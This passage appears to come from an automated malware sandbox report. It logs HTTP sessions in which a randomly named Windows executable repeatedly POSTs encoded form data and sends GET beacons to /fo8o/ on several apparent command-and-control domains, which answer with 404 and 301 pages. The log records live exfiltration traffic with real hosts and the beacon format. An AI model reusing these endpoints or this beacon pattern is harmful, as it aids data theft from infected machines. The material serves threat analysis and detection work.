                                                                                    Data Raw: 55 62 68 64 6d 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 69 4b 34 53 32 61 69 74 78 50 39 4f 6d 54 4b 35 74 56 57 73 56 31 47 52 6c 4a 39 49 61 6d 38 33 56 6a 67 62 4a 4d 45 61 58 49 75 67 57 4b 44 6e 31 5a 75 6e 47 7a 61 38 30 79 2f 6d 47 74 35 53 62 46 57 72 42 75 6f 42 61 4c 6b 37 39 6e 58 66 51 47 46 56 58 56 61 4f 4b 35 6a 51 69 4e 69 69 48 67 48 6e 6e 74 59 34 54 70 69 69 50 6d 36 33 54 41 68 66 59 65 31 7a 4a 74 6f 54 74 50 45 67 4d 38 61 71 62 56 6d 58 58 35 42 66 54 31 51 77 35 7a 65 58 49 64 72 2b 59 53 49 49 64 68 49 53 61 68 49 73 7a 47 4e 63 69 31 4e 6f 76 79 34 6b 6d 62 53 73 59 6e 36 30 39 74 77 3d
                                                                                    Data Ascii: Ubhdm=ic393dm3l8hWiK4S2aitxP9OmTK5tVWsV1GRlJ9Iam83VjgbJMEaXIugWKDn1ZunGza80y/mGt5SbFWrBuoBaLk79nXfQGFVXVaOK5jQiNiiHgHnntY4TpiiPm63TAhfYe1zJtoTtPEgM8aqbVmXX5BfT1Qw5zeXIdr+YSIIdhISahIszGNci1Novy4kmbSsYn609tw=
                                                                                    Jan 8, 2025 15:01:49.268565893 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:01:49 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    14 | 192.168.2.5 | 49990 | 66.29.149.46 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 8, 2025 15:01:51.207081079 CET | 803 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.techchains.info
                                                                                    Origin: http://www.techchains.info
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.techchains.info/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 49 33 56 43 77 62 4b 4e 45 61 55 49 75 67 59 71 44 6d 37 35 75 34 47 7a 57 4f 30 77 37 6d 47 70 52 53 62 41 79 72 43 5a 38 47 41 37 6b 39 37 6e 58 42 65 6d 46 56 58 56 61 4f 4b 35 47 48 69 4a 4f 69 48 77 58 6e 6d 4a 45 2f 65 4a 69 68 5a 32 36 33 58 41 67 55 59 65 31 46 4a 73 30 39 74 4e 4d 67 4d 38 71 71 62 42 36 51 64 35 42 5a 63 56 52 67 35 78 6a 64 50 72 6e 38 53 53 35 50 4e 67 6f 57 53 33 6c 47 70 6b 46 30 78 56 68 51 2f 68 77 54 33 72 7a 46 43 45 71 45 6a 36 6c 52 4e 63 71 31 55 39 69 56 32 62 32 58 2f 52 73 2b 46 6d 46 4e
                                                                                    Data Ascii: Ubhdm=ic393dm3l8hWjqoSw56t3v88szK5i1XlV1KRlNlYdVI3VCwbKNEaUIugYqDm75u4GzWO0w7mGpRSbAyrCZ8GA7k97nXBemFVXVaOK5GHiJOiHwXnmJE/eJihZ263XAgUYe1FJs09tNMgM8qqbB6Qd5BZcVRg5xjdPrn8SS5PNgoWS3lGpkF0xVhQ/hwT3rzFCEqEj6lRNcq1U9iV2b2X/Rs+FmFN
                                                                                    Jan 8, 2025 15:01:51.824213982 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:01:51 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    15 | 192.168.2.5 | 49991 | 66.29.149.46 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 8, 2025 15:01:53.737837076 CET | 1820 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.techchains.info
                                                                                    Origin: http://www.techchains.info
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.techchains.info/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Raw: 55 62 68 64 6d 3d 69 63 33 39 33 64 6d 33 6c 38 68 57 6a 71 6f 53 77 35 36 74 33 76 38 38 73 7a 4b 35 69 31 58 6c 56 31 4b 52 6c 4e 6c 59 64 56 51 33 56 31 77 62 4b 75 38 61 56 49 75 67 51 4b 44 6a 37 35 76 69 47 7a 2b 4b 30 77 6e 32 47 76 56 53 42 6d 2b 72 4b 4e 51 47 4f 4c 6b 39 35 6e 58 63 51 47 46 45 58 56 71 4b 4b 35 32 48 69 4a 4f 69 48 31 54 6e 68 64 59 2f 63 4a 69 69 50 6d 36 7a 54 41 68 7a 59 65 73 77 4a 73 41 44 75 39 73 67 4d 59 4f 71 65 79 53 51 41 4a 42 62 5a 56 51 6c 35 78 76 65 50 74 44 57 53 53 39 70 4e 6e 63 57 44 32 67 46 78 31 5a 31 7a 56 4d 79 39 68 4d 2f 32 39 50 59 42 6b 57 65 67 36 34 30 57 38 32 68 53 35 62 52 2b 37 33 2f 70 31 59 78 46 53 30 52 52 4a 71 57 32 41 7a 76 70 6a 47 62 49 38 31 4c 70 36 56 6b 71 62 39 50 7a 33 70 72 75 61 75 50 52 51 6d 44 34 44 49 71 68 2b 41 4e 67 61 38 6b 31 58 38 6b 79 50 74 4d 6d 67 59 70 30 4f 63 45 34 33 4a 57 57 37 4e 71 4c 65 49 6f 76 41 4a 52 66 63 6e 2f 44 2b 4a 63 52 51 61 42 5a 72 68 6b 73 75 44 75 5a 71 6c 45 73 48 4a 2f 58 37 38 67 [TRUNCATED]
                                                                                    Data Ascii: Ubhdm= [TRUNCATED]
                                                                                    Jan 8, 2025 15:01:54.347150087 CET | 637 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:01:54 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    16 | 192.168.2.5 | 49992 | 66.29.149.46 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 8, 2025 15:01:56.270982981 CET | 516 | OUT | GET /fo8o/?Ubhdm=vefd0teQh+kbruh5/qap98pA+QvvtGaRDgCUoL90YCYLczV+Hcc/TcCCUPfrz9W5FQiF6ivoXpNecnmrfO5hboQSxRfFXXJhWlOcLO2B4JSrf1qenLAzZaPHfWrFdh0bEA==&Dvh=YnI07v HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.techchains.info
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 8, 2025 15:01:56.879038095 CET | 652 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:01:56 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 493
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 [TRUNCATED]
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    17 | 192.168.2.5 | 49993 | 195.110.124.133 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 8, 2025 15:02:02.103715897 CET | 801 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Origin: http://www.elettrosistemista.zip
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Ascii: Ubhdm=WMd0CYxlLH1jvm2QnkfepwmYQQIuYykG6jxX+cvRCZ2PcFJrMrAJC6uXYmu9jdJ144zuz+Aa98THBBxGFcMzM3Fhc4OI/m70ifEzN/rrYZdyGQj7lGDwsDagrjfGFjE9PwKvlA+o6UAofp+T6G8m2sBsCErsRgNCiS0ZzIVTXvKZ7mVcccYSDRL+9JMDZ/HygKbKbeE=
                                                                                    Jan 8, 2025 15:02:02.765703917 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:02:02 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    18 | 192.168.2.5 | 49994 | 195.110.124.133 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 8, 2025 15:02:04.643358946 CET | 821 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Origin: http://www.elettrosistemista.zip
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Ascii: Ubhdm=WMd0CYxlLH1juGGQmHnehwmZVQIuSSkC6j9X+dqMCsuPfl5reqAJF6uXXGu8ndJq44/Qz/8a993HBF1GFrQ0PHFjXYOGiW70ifEzN+bRYdxyGAz7knDzvDajsjfGXTE5PwKNlBz96SEofrmT0ygl/sBqfUq5dwM06RAL4ukIIMeZ3w42G+Q6QxnGtaE0IPmb6pL6FJQ9lbnto8j6abTEyoqtnBRw
                                                                                    Jan 8, 2025 15:02:05.370394945 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:02:05 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    19 | 192.168.2.5 | 49995 | 195.110.124.133 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 8, 2025 15:02:07.179446936 CET | 1838 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Origin: http://www.elettrosistemista.zip
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 1242
                                                                                    Referer: http://www.elettrosistemista.zip/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 8, 2025 15:02:07.852940083 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:02:07 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    20 | 192.168.2.5 | 49996 | 195.110.124.133 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 8, 2025 15:02:09.706173897 CET | 522 | OUT | GET /fo8o/?Dvh=YnI07v&Ubhdm=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ== HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Host: www.elettrosistemista.zip
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Jan 8, 2025 15:02:10.386743069 CET | 367 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Wed, 08 Jan 2025 14:02:10 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 203
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    21 | 192.168.2.5 | 49997 | 217.196.55.202 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 8, 2025 15:02:31.965532064 CET | 789 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.empowermedeco.com
                                                                                    Origin: http://www.empowermedeco.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 206
                                                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                    Data Ascii: Ubhdm=rzPx9WPPN4oHTT64Dc3dI1wlWK2cTKU0a+tEGwteBm2uHo9nQQVpNP6tbz/W3QFGJi3wc7g+eYa29Cx/PhlLGFVT1qfUOqQVTpzLZCn+Y0XjHKp+5zkjI8iuPlQX3sXQGmlEtu/NizpUNIGgdPo3QRvUoOj+ho0JuM0qhu/SqKLDCG8NPyH4WBt4hzCyUqqRj7qc0W0=
                                                                                    Jan 8, 2025 15:02:32.541184902 CET | 1085 | IN | HTTP/1.1 301 Moved Permanently
                                                                                    Connection: close
                                                                                    content-type: text/html
                                                                                    content-length: 795
                                                                                    date: Wed, 08 Jan 2025 14:02:32 GMT
                                                                                    server: LiteSpeed
                                                                                    location: https://www.empowermedeco.com/fo8o/
                                                                                    platform: hostinger
                                                                                    panel: hpanel
                                                                                    content-security-policy: upgrade-insecure-requests
                                                                                    Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    22 | 192.168.2.5 | 49998 | 217.196.55.202 | 80 | 3200 | C:\Program Files (x86)\LvhEbETazCBsAXYgpzmmArtzDIFXiCzxNPhWTlVPRyABqIEvBJSsLtuBThsSsqkoBK\gaJjobDqjDYWsfRWPZSKY.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Jan 8, 2025 15:02:34.503525972 CET | 809 | OUT | POST /fo8o/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                    Accept-Language: en-US,en
                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                    Host: www.empowermedeco.com
                                                                                    Origin: http://www.empowermedeco.com
                                                                                    Cache-Control: no-cache
                                                                                    Connection: close
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Content-Length: 226
                                                                                    Referer: http://www.empowermedeco.com/fo8o/
                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
